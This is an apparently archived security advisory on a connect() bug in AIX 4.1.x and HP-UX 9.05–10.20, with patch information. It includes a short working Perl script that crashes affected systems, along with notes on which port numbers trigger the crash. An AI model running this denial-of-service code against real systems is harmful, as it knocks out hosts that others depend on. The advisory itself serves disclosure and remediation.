COMMAND

    connect()

SYSTEMS AFFECTED

    AIX 4.1.4, 4.1.5
    HpUX 9.05, 10.01, 10.20

PROBLEM

    Steve Campbell  did perl  script for  AIX connect() vulnerability,
    but this also craches HP  as well.  All you  have to do is to  run
    this simple perl program (or see #1 for c program).

        #!/usr/local/bin/perl5
        use Socket;
        socket (SOCK,AF_INET,SOCK_STREAM,0);
        $iaddr = inet_aton('localhost');
        $paddr = sockaddr_in('23',$iaddr);
        connect SOCK,$paddr;
        shutdown SOCK,2;
        $paddr = sockaddr_in('24',$iaddr);
        connect SOCK,$paddr;

    Frank Hofmann  has done  some tests  with the  connect example  on
    HP/UX 10.01.   The original  first connected  to port  23, shut it
    down and then  connected to port  24. He found  out only the  port
    number the  first connect  is made  to decides  whether the system
    crashes or  not; the  second connect  is required  to trigger  the
    crash, but the port connected to is unimportant.  So the sequence

            connect XX -> shutdown XX,2 -> connect ??

    crashes my HP/UX 10.01 box for XX  out of { 21, 23, 79, 111,  113,
    513, 514, 6000  }, but not  other XX he  has tried (anything  from
    1-120,  500-530  and  some  arbitrary  other  values).  He  got no
    running services on every port  I've tested - can't say  if that's
    important at the moment.

SOLUTION

    For  HP  10.01  box,  PHNE_9102  (ARPA transport cumulative patch)
    fixes the crash.

    APAR IX66819 will fix AIX, available in a couple of monthes. There
    is available an "emergency patch" from IBM. Anon FTP to

        testcase.boulder.ibm.com/aix/fromibm

    and get  the file  reconn.41 (for  AIX 4.1)  or reconn.42 (for AIX
    4.2). There's a new /usr/lib/methods/netinet and a README.